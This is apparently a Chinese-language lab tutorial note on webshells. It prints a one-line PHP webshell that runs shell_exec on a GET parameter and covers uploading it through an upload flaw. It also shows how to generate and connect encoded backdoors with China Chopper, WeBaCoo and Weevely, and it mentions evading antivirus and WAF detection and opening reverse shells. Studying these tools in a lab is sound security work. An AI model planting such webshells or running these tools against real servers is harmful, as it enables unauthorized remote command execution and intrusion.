webshell

本質:<?php echo shell_exec($_GET['cmd']);?>

windows平臺

中國菜刀官網:胖客戶端程式,國產中比較優秀的webshell,適用性較強  【但版本眾多而亂,可能存在木馬,據說的官網http://www.maicaidao.co/】

1、利用上傳漏洞,先上傳一句話木馬【支援三種伺服器端PHP、ASP、ASP.NET】

使用ssh連線metasploitable

建立包含木馬程式碼的檔案

2、連線相應的伺服器端

新增伺服器端URL  【密碼為一句話木馬中的引數】

雙擊進入檔案管理介面

也可以進入命令列模式【虛擬終端】  {許可權只為web程式的執行許可權}

可能被IDS、AV、WAF、掃描器軟體發現查殺  【可編碼免殺】

kali平臺下的webshell,本質與中國菜刀類似,有編碼功能,可避免被查殺

WeBaCoo(Web Backdoor Cookie)【只對PHP】

獲取的是類終端的shell

編碼通訊內容通過cookie頭傳輸,隱蔽性較強

引數:

cm:base64編碼的命令

cn:伺服器用於返回資料的cookie頭的名

cp:返回資訊定界符

1、生成伺服器端

wenacoo -g -o a.php

##利用scp上傳到metaspolitable的伺服器根目錄

移動webacoo.php到web根目錄

2、使用客戶端進行連線

webacoo -t -u http://1.1.1.1/a.php

##抓包分析如何通過cookie頭傳指令,手動觸發流量  【cm/cn/cp】

其他引數

webacoo -h

Weevely  【使用http頭進行指令(經過編碼)傳輸】

隱蔽的類終端PHP Webshell

有30多個管理模組

執行系統命令、瀏覽檔案系統

檢查伺服器常見配置錯誤

建立正向、反向TCP Shell連線

通過目標計算機代理HTTP流量

從目標計算機執行埠掃描,滲透內網

支援連線密碼

*****************************************************************

##kali中缺少庫

https://pypi.python.org/pypi/PySocks/  【下載庫檔案壓縮包】

./setup.py install

****************************************************************************************

1、生成服務端  【生成經過編碼的木馬】

weevely generate <password> <path>

##上傳木馬

2、連線客戶端

weevely <URL> <password> [cmd]

3、模組

help